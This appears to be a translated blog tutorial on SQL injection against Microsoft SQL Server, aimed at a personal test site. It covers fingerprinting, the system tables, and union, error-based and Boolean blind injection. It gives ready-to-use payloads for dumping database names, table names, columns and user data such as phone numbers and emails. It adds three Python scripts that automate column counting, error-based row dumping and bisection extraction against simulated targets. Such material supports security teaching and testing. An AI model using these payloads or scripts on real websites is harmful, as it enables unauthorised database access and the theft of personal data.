SQL injection - injection based on MSSQL (SQL Server)
2022-07-04 05:27:00 【In a word, the Trojan horse (the growth road of Wang an Xiaobai)】
Catalog
1. How to tell whether a website uses a SQL Server database
2. The three main system tables in SQL Server
3. Main SQL Server functions
4. Database injection process
5. Union query in SQL Server
6. Error-based injection in SQL Server
7. Boolean blind injection in SQL Server
1. How to tell whether a website uses a SQL Server database
- By file suffix: an .aspx (ASP.NET) page is a hint that the back end is SQL Server, but only a hint, since ASP.NET applications can use any database.
- By error message: SQL Server error text usually contains the word "Microsoft" (for example "Microsoft OLE DB Provider for SQL Server" or "Microsoft SQL Native Client"), and messages such as "Unclosed quotation mark after the character string" are specific to SQL Server.
- By system table: append and (select count(*) from sysdatabases)>0 to the query. If the page still renders normally, a table named sysdatabases exists, which identifies SQL Server; other databases have no such table and the condition raises an error there.
2. The three main system tables in SQL Server
- sysdatabases: lives in the master database; its name column holds the name of every database on the instance (query it as master..sysdatabases).
- sysobjects: one row per object in a database. id is the object id, name is the object name and xtype is its type: 'U' for a user table, 'S' for a system table ('V' is a view and 'P' a stored procedure).
- syscolumns: one row per column. id is the id of the owning table, which is obtained from sysobjects, and name is the column name.
These are SQL Server 2000 compatibility views; on modern versions the same information is in sys.databases, sys.objects and sys.columns, and information_schema.tables / information_schema.columns work as well.
3. Main SQL Server functions
- host_name(): returns the host name of the client that opened the connection, not the server; @@servername gives the server's name.
- current_user: the current database user. In T-SQL it is written without parentheses; user_name() and suser_sname() are the function forms, and system_user gives the login name.
- db_name(): the name of the current database.
- char(n): converts an ASCII code to its character, e.g. char(85) is 'U'; nchar(n) is the Unicode form.
- ascii(c): converts a character to its ASCII code; unicode(c) returns the code point and also works for non-ASCII data.
- substring(s, start, length): extracts part of a string; positions start at 1.
- len(s): the length of a string, needed to bound blind extraction loops.
- @@version: the server version string.
4. Database injection process
- Get database name
- Get the name of the table in the database
- Get the column name of the table in the database
- Get the corresponding data
5. Union query in SQL Server
1. Use the union keyword
2. Points to note when using union
- First find the number of columns of the original query with order by n: the page errors once n exceeds the column count.
- Unlike MySQL, SQL Server requires each column of the two selects to have compatible types; a string placed in a slot the original query fills with an int raises a conversion error. null is compatible with every type, so start with null in every slot.
- Determine which columns are displayed on the page.
- Make the original query return nothing (for example a non-existent id) so that only the injected rows are displayed.
3. Demonstration of a union query against a SQL Server database
Note: the target is a personal test site; do not attack real websites.
3.1 First find the injection point, then the injection type
Appending a single quote produces an error message.

3.2 Use id=2-1 to determine the parameter type
The page is the same as for id=1, so the arithmetic was evaluated by the database and the parameter is numeric (not wrapped in quotes). Next use a union query.
3.3 Use order by to find the number of columns
The query succeeds up to order by 13, so there are 13 columns.

3.4 Confirm the data type of each column. Filling all 13 slots with constants raises a type-mismatch error, so replace the slots with null.

With every slot set to null the query still fails. The cause is that union removes duplicate rows by default (an implicit distinct), and to compare rows SQL Server must be able to compare every column; a text, ntext or image column in the original query is not comparable, so the server refuses the query.

Changing union to union all skips the duplicate removal and clears that error. Usually the database can be read at this point, but in this environment the query still fails once constants are put back, which means some slots still have mismatched types. Replace slots with null one at a time, starting from the first, until no error is reported. In the end positions 3,4,6,7,10,11 turn out to be character columns and 1,2,5,8,9,12,13 numeric.

3.5 Now the database information can be obtained through the union query and read off the page
3.5.1 Get all database names
payload:id=1 UNION all SELECT 1,2,name,null,5,null,null,8,9,null,null,12,13 from master..sysdatabases

3.5.2 Get the name of the current database
payload:id=1 UNION all SELECT 1,2,db_name(),null,5,null,null,8,9,null,null,12,13 from master..sysdatabases
(db_name() takes no table; the from clause only has to exist so that a row is returned, and a select without from would also work.)

3.5.3 Get the table names in the current database
payload:id=1 UNION all SELECT 1,2,name,null,5,null,null,8,9,null,null,12,13 from jiaofan..sysobjects where xtype = 0x75
(xtype = 0x75 is the quote-free way of writing xtype = 'u': the varbinary literal is implicitly converted to char, and 'u' matches 'U' because the default collation is case-insensitive. xtype = char(85) is equivalent.)

3.5.4 Get the columns of a table
payload:id=1 UNION all SELECT 1,2,name,null,5,null,null,8,9,null,null,12,13 from jiaofan..syscolumns where id = (select id from jiaofan..sysobjects where name = 0x73006C005F007500730065007200)
(0x73006C005F007500730065007200 is the table name sl_user encoded as UTF-16LE, i.e. 's',0,'l',0,'_',0,... The name column is nvarchar (sysname), so the two-byte form is required. Hex literals pass strings without quotes, which matters when quotes are filtered or escaped.)

3.5.5 Get the values in the columns
payload:id=1 UNION all SELECT 1,2,shouji,null,5,youxiang,null,8,9,null,null,12,13 from sl_user
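The union procedure above (order by to count columns, null substitution to type them, hex literals to avoid quotes, and the final select list) can be automated. The script below is an added example and not code from the original post. It drives an oracle function that answers "did the page render normally for this id value"; here the oracle is a stub that simulates the post's 13-column target with text at positions 3,4,6,7,10,11, and in practice it would be replaced by an HTTP request compared against the id=1 baseline. Probing a slot with char(97) rather than a quoted string keeps the payload quote-free; a slot that errors on a string is "not text" (int, datetime, uniqueidentifier and so on), not necessarily numeric.

```python
import re
from typing import Callable, Dict, Set

Oracle = Callable[[str], bool]  # takes the value of the id parameter, True if the normal page came back

# Constructed stand-in for the target: 13 columns, text at the positions the
# post's walkthrough found. The figures follow the post; the stub is ours.
FAKE_COLUMN_COUNT = 13
FAKE_TEXT_POSITIONS = {3, 4, 6, 7, 10, 11}

_ORDER_RE = re.compile(r"1 order by (\d+)")
_UNION_RE = re.compile(r"1 union all select (.+) from \S+")


def stub_oracle(param: str) -> bool:
    """Simulated page: True unless SQL Server would raise an error."""
    m = _ORDER_RE.fullmatch(param)
    if m:
        return int(m.group(1)) <= FAKE_COLUMN_COUNT  # order by n fails past the column count
    m = _UNION_RE.fullmatch(param)
    if m:
        exprs = [e.strip() for e in m.group(1).split(",")]
        if len(exprs) != FAKE_COLUMN_COUNT:
            return False
        for pos, expr in enumerate(exprs, start=1):
            if expr == "null":
                continue  # null is compatible with every column type
            if expr == "char(97)" and pos not in FAKE_TEXT_POSITIONS:
                return False  # 'a' cannot be converted to the numeric column type
            if expr.isdigit() and pos in FAKE_TEXT_POSITIONS:
                return False  # the text rows would be converted to int and fail
        return True
    return False


def find_column_count(oracle: Oracle, limit: int = 64) -> int:
    """Increase order by n until the page errors; the last good n is the count."""
    n = 1
    while n <= limit and oracle(f"1 order by {n}"):
        n += 1
    return n - 1


def classify_columns(oracle: Oracle, count: int, table: str = "master..sysdatabases") -> Set[int]:
    """Positions that accept a string. union all is used on purpose: plain union
    performs a distinct and fails on text/ntext/image columns."""
    text: Set[int] = set()
    for pos in range(1, count + 1):
        exprs = ["null"] * count
        exprs[pos - 1] = "char(97)"
        if oracle(f"1 union all select {','.join(exprs)} from {table}"):
            text.add(pos)
    return text


def hex_literal(value: str, nchar: bool = True) -> str:
    """0x... literal that needs no quotes. UTF-16LE for nvarchar targets such as
    sysobjects.name (sysname), plain ASCII for varchar columns."""
    raw = value.encode("utf-16-le" if nchar else "ascii")
    return "0x" + raw.hex().upper()


def build_union_payload(count: int, text_positions: Set[int], selections: Dict[int, str], table: str) -> str:
    """Numeric slots get their index (so the position is visible on the page),
    text slots get null, and the chosen slots get the expressions to display."""
    exprs = []
    for pos in range(1, count + 1):
        if pos in selections:
            exprs.append(selections[pos])
        elif pos in text_positions:
            exprs.append("null")
        else:
            exprs.append(str(pos))
    return f"1 union all select {','.join(exprs)} from {table}"


if __name__ == "__main__":
    n = find_column_count(stub_oracle)
    text = classify_columns(stub_oracle, n)
    print(n, sorted(text))
    print(build_union_payload(n, text, {3: "name"}, "master..sysdatabases"))
    print(hex_literal("sl_user"))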

6. Error-based injection in SQL Server
Error-based injection in SQL Server relies on type conversion: and 1=(select ...) makes the server convert the selected string to int so it can compare it with 1, and when the string is not a number the conversion fails with an error that quotes the value, for example "Conversion failed when converting the nvarchar value 'jiaofan' to data type int." This only works when the application shows database errors on the page.
1. Demonstration of error-based injection in SQL Server
1.1 Get the current database
payload:id=1 and 1=(select db_name())

1.2 Get all databases (the comparison and 1=() can only convert a single value, so the subquery must return one row at a time; use top to page through the rows)
payload:id=1 and 1= (select top 1 name from master..sysdatabases)
To get the second row, exclude the first with not in:
payload:id=1 and 1= (select top 1 name from master..sysdatabases where name not in( select top 1 name from master..sysdatabases ))
Without an order by the row order is not guaranteed, so add order by name to both selects when the dump must be complete and repeatable. A value that happens to be numeric converts without error and is lost; prefixing a non-numeric marker such as char(126)+name avoids that.

1.3 Get the table names in the current database
payload:id=1 and 1= (select top 1 name from jiaofan..sysobjects where xtype = 0x75)

1.4 Get the column names in a table
Because this involves two tables, join them on the object id:
payload:id=1 and 1= (select top 1 c.name from jiaofan..syscolumns c ,jiaofan..sysobjects o where c.id = o.id and o.name =0x73006C005F007500730065007200 )
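The paging trick above (top 1 ... not in (select top n ...)) becomes a loop once the leaked value is parsed out of the error message. The script below is an added example, not code from the original post: it dumps one column of one table through conversion errors, one request per row, with order by on both selects for a deterministic order and char(126) prepended so that numeric-looking values still fail the int conversion. The target is simulated by stub_send, which returns a page carrying the SQL Server error text for the rows of a constructed master..sysdatabases; against a real site, send would issue the HTTP request and return the body. Error pages usually HTML-escape the quotes around the value, so the parser unescapes first and accepts both the 2008+ and the 2000/2005 wording.

```python
import html
import re
from typing import Callable, Dict, List, Optional, Tuple

# Constructed fixture for the simulated target; these names are ours, not
# results from the original post.
FAKE_TABLES: Dict[Tuple[str, str], List[str]] = {
    ("master..sysdatabases", "name"): ["jiaofan", "master", "model", "msdb", "tempdb"],
}

# "Conversion failed when converting the nvarchar value 'x' to data type int." (2008+)
# "Syntax error converting the nvarchar value 'x' to a column of data type int." (2000/2005)
_LEAK_RE = re.compile(
    r"converting the n?varchar value '([^']*)' to (?:a column of )?data type int")


def leaked_value(body: str) -> Optional[str]:
    """Return the quoted value from a conversion error in a page body, if any."""
    m = _LEAK_RE.search(html.unescape(body))
    return m.group(1) if m else None


def paged_subquery(table: str, column: str, n: int) -> str:
    """Scalar T-SQL subquery for the (n+1)-th row of table.column in sorted order.
    char(126) is '~': the marker guarantees the string is never a valid int,
    so the conversion always fails and the value is always reported."""
    return (f"(select top 1 char(126)+{column} from {table} "
            f"where {column} not in (select top {n} {column} from {table} order by {column}) "
            f"order by {column})")


def dump_column(send: Callable[[str], str], table: str, column: str, limit: int = 1000) -> List[str]:
    """Leak every row of table.column. `send` takes the value of the injectable
    id parameter and returns the response body."""
    rows: List[str] = []
    for n in range(limit):
        value = leaked_value(send(f"1 and 1={paged_subquery(table, column, n)}"))
        if value is None:
            break  # no error: the subquery returned no row and 1=NULL is simply false
        rows.append(value[1:])  # drop the char(126) marker
    return rows


_PAGE_RE = re.compile(
    r"1 and 1=\(select top 1 char\(126\)\+(\w+) from (\S+) "
    r"where \1 not in \(select top (\d+) \1 from \2 order by \1\) order by \1\)")


def stub_send(param: str) -> str:
    """Simulated target that prints database errors. It understands only the
    payload shape produced by paged_subquery."""
    m = _PAGE_RE.fullmatch(param)
    if m:
        column, table, n = m.group(1), m.group(2), int(m.group(3))
        rows = sorted(FAKE_TABLES.get((table, column), []))
        if n < len(rows):
            return ("<b>Conversion failed when converting the nvarchar value "
                    f"&#39;~{rows[n]}&#39; to data type int.</b>")
    return "<html>normal page</html>"


if __name__ == "__main__":
    print(dump_column(stub_send, "master..sysdatabases", "name"))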

7. Boolean blind injection in SQL Server
1. Demonstration of Boolean blind injection in SQL Server
1.1 Get the number of databases
payload:id=1 and (select count(*) from master..sysdatabases) >7

id=1 and (select count(*) from master..sysdatabases) >8
If the page renders normally for >7 but not for >8, there are exactly 8 databases.

1.2 Get the name of the current database, one character at a time
payload:id=1 and substring((select db_name()),1,1)=char(106)
char(106) is 'j', the first letter of jiaofan. Note that = on strings follows the collation, which is case-insensitive by default, so this would also match 'J'; compare ascii() or unicode() of the character with a number for an exact result, and use > to bisect instead of testing one candidate per request.
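The character-at-a-time extraction above is usually done by bisection rather than by testing one char() value per request. The script below is an added example, not code from the original post. It recovers the number of databases and any scalar T-SQL expression (db_name() or a top 1 subquery) from a Boolean oracle, asking only "is the value greater than mid"; it reads len() first because substring() past the end of the string returns '' and unicode('') is NULL, which makes every comparison false, and it compares unicode() rather than the character so the result is exact and case-sensitive. The oracle is a stub that simulates the post's target with the database name jiaofan and 8 databases; against a real site it would send id=1 and <condition> and compare the response with the id=1 baseline.

```python
import re
from typing import Callable, Dict

Oracle = Callable[[str], bool]  # sends "id=1 and <condition>", True if the normal page came back

# Constructed fixture for the simulated target: what the probed expressions
# evaluate to and how many databases exist. "jiaofan" and the count of 8
# follow the post; the fixture itself is ours.
FAKE_VALUES: Dict[str, str] = {
    "db_name()": "jiaofan",
    "(select top 1 name from master..sysdatabases order by name)": "jiaofan",
}
FAKE_DB_COUNT = 8


def bisect_value(greater_than: Callable[[int], bool], lo: int, hi: int) -> int:
    """Find x in [lo, hi] using only answers to 'x > mid'; ceil(log2(hi-lo+1)) requests."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def count_databases(oracle: Oracle) -> int:
    # 32767 is the maximum number of databases on one SQL Server instance
    return bisect_value(lambda n: oracle(f"(select count(*) from master..sysdatabases)>{n}"), 0, 32767)


def extract_string(oracle: Oracle, expr: str) -> str:
    """Recover the value of a scalar T-SQL expression character by character."""
    length = bisect_value(lambda n: oracle(f"len({expr})>{n}"), 0, 128)  # sysname is nvarchar(128)
    chars = []
    for pos in range(1, length + 1):
        # unicode() of the character: 16 requests per character, exact and case-sensitive
        code = bisect_value(lambda n, p=pos: oracle(f"unicode(substring({expr},{p},1))>{n}"), 0, 0xFFFF)
        chars.append(chr(code))
    return "".join(chars)


_COUNT_RE = re.compile(r"\(select count\(\*\) from master\.\.sysdatabases\)>(\d+)")
_CHAR_RE = re.compile(r"unicode\(substring\((.+),(\d+),1\)\)>(\d+)")
_LEN_RE = re.compile(r"len\((.+)\)>(\d+)")


def stub_oracle(condition: str) -> bool:
    """Simulated target: True when 'id=1 and <condition>' renders the id=1 page."""
    m = _COUNT_RE.fullmatch(condition)
    if m:
        return FAKE_DB_COUNT > int(m.group(1))
    m = _CHAR_RE.fullmatch(condition)
    if m:
        value, pos, n = FAKE_VALUES.get(m.group(1), ""), int(m.group(2)), int(m.group(3))
        ch = value[pos - 1:pos]
        return bool(ch) and ord(ch) > n  # '' -> unicode('') is NULL -> comparison is false
    m = _LEN_RE.fullmatch(condition)
    if m:
        return len(FAKE_VALUES.get(m.group(1), "")) > int(m.group(2))
    return False


if __name__ == "__main__":
    print(count_databases(stub_oracle))
    print(extract_string(stub_oracle, "db_name()"))
```

The same extract_string call works for any row-valued expression once it is wrapped in top 1 with the not in paging from the error-based section, so the whole database/table/column/data walk reduces to a few hundred requests per value.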
